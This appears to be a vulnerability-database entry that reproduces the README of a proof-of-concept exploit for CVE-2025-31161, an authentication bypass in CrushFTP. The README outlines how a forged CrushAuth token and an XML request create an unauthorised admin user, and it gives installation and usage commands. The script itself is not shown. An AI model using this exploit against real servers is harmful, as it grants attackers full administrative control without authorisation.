Related vulnerabilities
Description
PoC CVE-2025-31161 - Authentication Bypass CrushFTP
Introduction
# CVE-2025-31161 - CrushFTP Authentication Bypass Exploit
---
## 📌 CVE Details
- **ID**: CVE-2025-31161
- **Type**: Authentication Bypass
- **Vendor**: CrushFTP
- **Impact**: Allows unauthenticated attackers to forge a valid `CrushAuth` token and create a fully privileged admin user.
- **More Info**: [NVD Entry (when available)](https://nvd.nist.gov/vuln/detail/CVE-2025-31161)
---
## ⚙️ Description
This exploit targets a critical vulnerability in **CrushFTP**, allowing remote unauthenticated attackers to **bypass authentication** and **create arbitrary admin users**.
It works by crafting a valid-looking `CrushAuth` token and abusing the `/WebInterface/function/` endpoint to submit a fully-formed XML payload.
---
## 🚀 Usage
### 🔧 Requirements
- `curl`
- `shuf`
### Installation
```bash
git clone https://github.com/f4dee-backup/CVE-2025-31161
```
```bash
cd CVE-2025-31161
```
```bash
chmod +x CVE-2025-31161.sh
```
### Help Panel:
```
./CVE-2025-31161.sh --help
[?] Parameters description:
--url Target base URL (e.g., http://target)
--port Port where CrushFTP is running
--target-user Valid or invalid username (e.g., crushadmin)
--new-user Username to be created (e.g., Pwn3d)
--new-password Password for the new user
--help Show this help panel
[i] Example: bash ./cve_official.sh --url http://target.com --port 80 --target-user crushadmin --new-user evilUser --new-password pass12345
```
File snapshot
[4.0K] /data/pocs/28d6aae82e7dadd9b3698506b086317d30e9f506
├── [6.7K] CVE-2025-31161.sh
├── [1.0K] LICENSE
├── [1.5K] README.md
└── [ 30] requirements.txt
0 directories, 4 files